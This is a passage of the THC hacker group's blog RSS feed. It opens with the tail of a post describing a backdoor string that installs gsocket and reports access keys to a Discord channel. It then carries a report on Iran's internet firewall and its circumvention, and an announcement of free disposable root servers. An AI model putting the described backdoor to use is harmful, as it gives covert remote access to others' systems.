The installer-script installs &lt;a target=&quot;_blank&quot; href=&quot;http://gsocket.io/deploy&quot;&gt;gsocket&lt;/a&gt; and if successful reports the access key and system metrics to our discord channel.&lt;/p&gt;&lt;p&gt;Thereafter the &lt;strong&gt;backdoor-string&lt;/strong&gt; checks if the user wanted to execute a command rather than a shell.&lt;/p&gt;&lt;p&gt;The last four lines are when the user logs in to a shell - the normal case:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Set the SHELL variable if not set already.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simulate Linux&apos;s motd.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Execute the user&apos;s shell.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Keep Hacking,&lt;/p&gt;&lt;h1 id=&quot;heading-the-hackers-choice&quot;&gt;The Hacker&apos;s Choice&lt;/h1&gt;]]&gt;</content:encoded><hashnode:coverImage>https://cdn.hashnode.com/res/hashnode/image/upload/v1684926176761/7cdd426e-07f0-449b-a8d6-f5d97f7a9b74.jpeg</hashnode:coverImage></item><item><title><![CDATA[The Iran Firewall - A preliminary report]]></title><description><![CDATA[The Internet is easily censored. The neo-liberal's got their arses kicked. The big players like Google/Apple/AWS are partly to blame. China runs the GFI.]]></description><link>https://blog.thc.org/the-iran-firewall-a-preliminary-report</link><guid isPermaLink="true">https://blog.thc.org/the-iran-firewall-a-preliminary-report</guid><category><![CDATA[iran]]></category><category><![CDATA[proxy]]></category><category><![CDATA[freedom]]></category><dc:creator><![CDATA[root]]></dc:creator><pubDate>Fri, 28 Oct 2022 12:45:11 GMT</pubDate><content:encoded>&lt;![CDATA[&lt;p&gt;I got sidetracked for the last 3 days to assess the Great Firewall of Iran (GFI).&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;TL;DR&lt;br /&gt;The Internet is easily censored. The neo-liberals got their arses kicked. The big players like Google/Apple/AWS are partly to blame. 
China runs the GFI as a service.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;The GFI uses Deep Packet Inspection (DPI) on all international peering points. In addition, the local operators (telco &amp;amp; DSL) use their own Firewall but most of them are static and badly configured. Some use DPI.&lt;/p&gt;&lt;p&gt;The GFI is port number agnostic and changing the port number of a service will not yield success.&lt;/p&gt;&lt;p&gt;The GFI consists of three parts:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;All blacklisted domains resolve to 10.0.34.35&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;An active component constantly scans Iran&apos;s internal network for &apos;hostile&apos; services (like open Socks5 proxies).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;IP addresses are rarely fully blocked. Instead, the TCP 3-way handshake won&apos;t complete (the syn-ack is dropped).&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;The GFI seems to operate differently almost every day - from severe disruption to barely any disruption.&lt;/p&gt;&lt;p&gt;The most severe disruption is when the regime turns off all cell towers and all local Internet. They just pull the plug and it&apos;s game over for any neo-liberal smart-arse that thinks V2ray/Tor/Shadowsocks is the solution.&lt;/p&gt;&lt;p&gt;All Free Internet is blocked from all Mobile Phones and some DSL connections between 4pm and 12pm (it&apos;s OFF). During these hours only VPSs inside of Iran can (sometimes) access the Free Internet. Volunteers are running V2Ray/Shadowsocks/etc relays on VPSs inside of Iran to reach the Free Internet. Those relays last hours or a few days before getting blocked by the GFI (The VPS provider is legally obligated to shut them down thereafter).&lt;/p&gt;&lt;p&gt;At the moment the Free Internet is mostly only accessible to geeks and those who can tunnel out using various protocols and tricks.&lt;/p&gt;&lt;p&gt;The worst affected are the ordinary citizens. The GFI blocks them effectively. 
Many people (and mostly women) depend on the Free Internet for work. The illegal regime of Iran uses the GFI as a form of blackmail - to run them out of money (and by that out of their independence).&lt;/p&gt;&lt;p&gt;On bad days:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Tor is blocked (since day 1).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;WireGuard/OpenVPN are blocked (since day 1).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;V2ray/Vmess/Shadowsocks/... are either permanently blocked or blocked as soon as the IP address of the EXIT node becomes known.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The DPI blocks on TLS&apos;s cleartext SNI.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Any outbound traffic is blocked after 1k-4k is transmitted upstream.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Any website that offers VPN solutions is blocked (ProtonVPN, Mullvad, NordVPN, ..). Those who already had the software before the GFI cannot use it (most apps require registering an account or making an API call to a WebRTC endpoint - which is blocked).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Cloudflare is blocked (including DoH/DoT/DoQ).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Docker is sometimes blocked.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Google Play and App Store are blocked.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Some operators use a whitelist and block all other websites.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The local operator that blocks the most is IR-MCI (aka HamrahAvval). They seem to be regime lovers.&lt;/p&gt;&lt;p&gt;The users of Iran cannot get to the software that would help them circumvent the GFI. This is mostly a failing of Google/Apple and the big players: it is no longer (easily) possible to copy software from one device to another (or when the network is down).&lt;/p&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://github.com/hackerschoice/iran-ssh-proxy/wiki/China-probes-on-Iran-VPS-after-GFI-piercing&quot;&gt;China is involved&lt;/a&gt;. 
Connecting to any random port number from the outside world on any server inside of Iran (passing the GFI) is almost always followed by a port probe on &lt;em&gt;that specific port&lt;/em&gt; from an IP address belonging to China.&lt;/p&gt;&lt;p&gt;The filtering on TLS by SNI is embarrassing. TLS is not secure until the SNI is encrypted. I was there at the IETF-88 (9 years ago) and part of the TLS working group when Eric Rescorla famously said that encrypted SNI is not a priority and that the big players like Google/Apple/Facebook/AWS all want speed (lower RTT) over security. We &lt;a target=&quot;_blank&quot; href=&quot;https://mailarchive.ietf.org/arch/msg/tls/fkIt8X2XZB7RAauV3ujChoWlJWQ/&quot;&gt;tried hard to convince the players&lt;/a&gt; but got shut down.&lt;/p&gt;&lt;p&gt;The GFI extends to SMS and OTP. The users (if they get Internet) cannot log in to their accounts or sign up for new services (WhatsApp/Signal/VPN/..): Many services rely on 2FA by SMS/OTP. Those SMS/OTP messages are dropped by the Mobile Operators. 2FA becomes a DoS. Checkmate.&lt;/p&gt;&lt;p&gt;Recommendations:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;The big players (Google/Apple) should implement a feature that allows users to share apps with friends (via Bluetooth) when the network is down.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;VPN providers should make their apps work when the above-mentioned restrictions are in place.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;A mesh-like networking method is needed (using local wifi or Bluetooth) when the main network goes down.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Encrypted SNI needs to happen without fallback to non-encrypted SNI.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Exemption from sanctions to get Starlink and other equipment into the country and a transport method (Customs and Border Control seizes shipments. 
Donkeys and smugglers are at their capacity limit and not reliable enough).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&quot;How to stage a rebellion effectively&quot; should be part of the school&apos;s syllabus. In the decades to come the knowledge to rebel against oppression and tyranny will be more useful to our children than knowing about Nietzsche or why Bonobo Apes are so happy.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Does China breach sanctions by providing the GFI as a service?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Iran signed the &lt;a target=&quot;_blank&quot; href=&quot;https://www.un.org/en/about-us/universal-declaration-of-human-rights&quot;&gt;Universal Declaration of Human Rights&lt;/a&gt;. May the UN comment on why Iran is allowed to disregard it and what that means for the integrity of the UN if members can pick and choose at will.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;img src=&quot;https://cdn.hashnode.com/res/hashnode/image/upload/v1666960222617/LGiX1EeUo.png&quot; alt=&quot;Screenshot 2022-10-28 at 13.29.35.png&quot; /&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Thank you to all the courageous people of Iran who provided me with access to various servers and DSL systems. You are the true heroes.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Stay safe and read our &lt;a target=&quot;_blank&quot; href=&quot;https://hackerschoice.medium.com/it-security-and-privacy-for-the-rebellions-of-the-world-db4023cadcca&quot;&gt;IT Security and Privacy for the rebellions around the world&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;s&gt;THC operates a variety of EXIT nodes and Proxy Services in Iran. &lt;/s&gt; We need help. Join us on &lt;a target=&quot;_blank&quot; href=&quot;https://t.me/+tIblf9hhvBAwOGNk&quot;&gt;Telegram&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Addition: After writing this article I got asked about the most reliable way to circumvent the GFI. &lt;s&gt;A relay host inside of Iran is needed (Iran-Relay) and an EXIT node outside of Iran (EU-EXIT). 
The Iran-User and the EU-EXIT node both need to connect TO the Iran-Relay (connecting from the Iran-Relay TO EU-EXIT is sometimes blocked). Iran-User and EU-EXIT &quot;meet&quot; at the Iran-Relay. Iran-User TO Iran-Relay traffic needs to be obfuscated (V2ray/Shadowsocks/SSH are effective). EU-EXIT to Iran-Relay traffic needs less obfuscation (SSH works just fine). No software needs to run on the Iran-Relay, which gives the Iran-Relay admin plausible deniability. No IP addresses must be logged. &lt;/s&gt; &lt;a target=&quot;_blank&quot; href=&quot;https://github.com/hackerschoice/iran-ssh-proxy&quot;&gt;&lt;s&gt;This is the setup that THC is providing&lt;/s&gt;&lt;/a&gt;&lt;s&gt;.&lt;/s&gt;&lt;/p&gt;&lt;p&gt;&lt;s&gt;The most widely adopted solution however is a V2Ray/Shadowsocks connection from Iran-User to the Iran-Relay and an iptables DNAT to EU-EXIT. It seems to work most (but not all) of the time.&lt;/s&gt;&lt;/p&gt;&lt;p&gt;The most widely adopted solution is XTLS/Trojan gRPC.&lt;/p&gt;&lt;p&gt;There are many firewalls at play, the main one being at the international junction point, where the DPI is done.&lt;/p&gt;&lt;p&gt;Domain Fronting and SNI faking are not reliable. They may work for a few days until the Freedom-IP is blacklisted. The GFI has now almost fully transitioned to a &apos;whitelisting&apos; model where everything is blocked or throttled to 0-10Mbit unless the flow is to a whitelisted SNI on a whitelisted IP. Running your own Exit Node in Freedom only works for 1-3 weeks on average until the IP (or the entire AS) gets blacklisted or throttled.&lt;/p&gt;]]&gt;</content:encoded></item><item><title><![CDATA[Disposable Root Servers]]></title><description><![CDATA[We love to research, explore, play and tinker. This journey almost always starts on a Linux Root Shell. Let this be the start of your journey. Use SSH and connect:
ssh root@segfault.net # Password is 'segfault'

Every SSH connection spawns a new Root...]]></description><link>https://blog.thc.org/disposable-root-servers</link><guid isPermaLink="true">https://blog.thc.org/disposable-root-servers</guid><category><![CDATA[Linux]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[root]]></dc:creator><pubDate>Fri, 14 Oct 2022 08:57:08 GMT</pubDate><content:encoded>&lt;![CDATA[&lt;p&gt;We love to research, explore, play and tinker. This journey almost always starts on a Linux Root Shell. Let this be the start of your journey. Use SSH and connect:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;lang-bash&quot;&gt;ssh root@segfault.net &lt;span class=&quot;hljs-comment&quot;&gt;# Password is &apos;segfault&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Every SSH connection spawns a new Root Server for you to use. Check out the &lt;a target=&quot;_blank&quot; href=&quot;https://www.thc.org/segfault&quot;&gt;release page&lt;/a&gt; for more information and what you can do with it.&lt;/p&gt;&lt;p&gt;It allows anyone to use a &lt;em&gt;disposable linux root server&lt;/em&gt;. The Server only exists while you are logged in. It self-destructs after log out. It comes with many many features. Here are just a few:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Encrypted&lt;/strong&gt; Filesystem (only you know the password to unlock it).&lt;/li&gt;&lt;li&gt;Over &lt;strong&gt;8GB&lt;/strong&gt; of the finest hacking/coding tools pre-installed.&lt;/li&gt;&lt;li&gt;Outbound traffic is routed via a selection of constantly &lt;strong&gt;rotating VPN peers&lt;/strong&gt;.&lt;/li&gt;&lt;li&gt;Encrypted DNS.&lt;/li&gt;&lt;li&gt;Reverse &lt;strong&gt;Port Forwards&lt;/strong&gt; (forget ngrok. 
This is free &amp;amp; better).&lt;/li&gt;&lt;li&gt;Your server will &lt;strong&gt;self-destruct&lt;/strong&gt; on log out (and all data &amp;amp; traces will get wiped).&lt;/li&gt;&lt;/ul&gt;&lt;h2 id=&quot;heading-mission&quot;&gt;Mission&lt;/h2&gt;&lt;p&gt;This is for hackers and coders who like to experiment on a fresh and clean Linux Server that is safely connected to the Internet. It shall be used for good purposes only.&lt;/p&gt;&lt;p&gt;As hackers&lt;sup id=&quot;1&quot;&gt;&lt;a class=&quot;post-section-overview&quot; href=&quot;#hackers&quot;&gt;1&lt;/a&gt;&lt;/sup&gt;, we have no interest in money or financial gains. We do not care if our research is liked or disliked, used or discarded. We are here for the journey. To learn and to push the limits and seek the unknown. We research for the sake of researching.&lt;/p&gt;&lt;p&gt;This is a free service. THC asks for nothing in return but encourages you to &lt;a target=&quot;_blank&quot; href=&quot;https://t.me/thcorg&quot;&gt;join our Telegram Channel&lt;/a&gt;. Take part in the discussions, share your knowledge and ask your questions.&lt;/p&gt;&lt;h2 id=&quot;heading-history&quot;&gt;History&lt;/h2&gt;&lt;p&gt;This is the resurrection of our 1997 &apos;segfault.net&apos; root server. The server of &apos;97 served as a stepping stone for many hackers, coders and researchers. It&apos;s where we hosted &lt;a target=&quot;_blank&quot; href=&quot;https://www.phrack.org&quot;&gt;phrack&lt;/a&gt;, &lt;a target=&quot;_blank&quot; href=&quot;https://en.wikipedia.org/wiki/TESO_\(Austrian_hacker_group\)&quot;&gt;Team Teso&lt;/a&gt;, HERT, &lt;a target=&quot;_blank&quot; href=&quot;https://hitb.org/&quot;&gt;Hack in the Box&lt;/a&gt;, the first encrypted IRC network and many others.&lt;/p&gt;&lt;p&gt;I &lt;a target=&quot;_blank&quot; href=&quot;http://www.phrack.org/issues/70/14.html&quot;&gt;shut it down in 2019&lt;/a&gt;. 
Now it&apos;s back.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Better, faster, more secure and as a cloud service - for anyone to enjoy.&lt;/p&gt;&lt;/blockquote&gt;&lt;h2 id=&quot;heading-is-it-safe&quot;&gt;Is it safe?&lt;/h2&gt;&lt;p&gt;&lt;em&gt;Nobody ever got arrested for choosing &lt;a target=&quot;_blank&quot; href=&quot;https://www.thc.org/segfault&quot;&gt;segfault.net&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;&lt;hr /&gt;&lt;ol&gt;&lt;li&gt;&lt;span id=&quot;hackers&quot;&gt;&lt;/span&gt; Do not confuse hackers with criminals. Somebody who uses hacking techniques to commit a crime is not a hacker. He is a criminal. The same way that somebody who uses an axe to murder is not a lumberjack. Criminals disgust us.&lt;/li&gt;&lt;/ol&gt;&lt;hr /&gt;]]&gt;</content:encoded><hashnode:coverImage>https://cdn.hashnode.com/res/hashnode/image/unsplash/4Mw7nkQDByk/upload/v1665736760629/AFYZLHfyz.jpeg</hashnode:coverImage></item></channel></rss>